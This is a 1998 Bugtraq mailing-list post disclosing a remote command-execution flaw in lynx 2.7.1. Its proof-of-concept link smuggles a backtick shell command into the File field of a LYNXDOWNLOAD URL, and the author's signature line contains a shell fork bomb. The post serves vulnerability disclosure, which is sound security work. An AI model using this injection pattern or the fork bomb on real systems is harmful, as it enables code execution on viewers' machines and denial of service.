[6318] in bugtraq
Very, very ugly remote lynx 2.7.1 hole
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Tue Mar 17 15:21:41 1998
Date: Tue, 17 Mar 1998 16:27:29 +0100
Reply-To: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
From: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
While poking around lynx protocol handling routines, I found this very
big, ugly remote hole:
<a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test">
CLICK HERE
</a>
It allows remote execution of any code on viewer's machine. Also, by
setting 'Method' field to 0 or more, you may crash lynx, but it isn't so
exciting as above URL. Also, it's possible to parse /dev/zero as 'File',
also not funny.
Greetings,
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=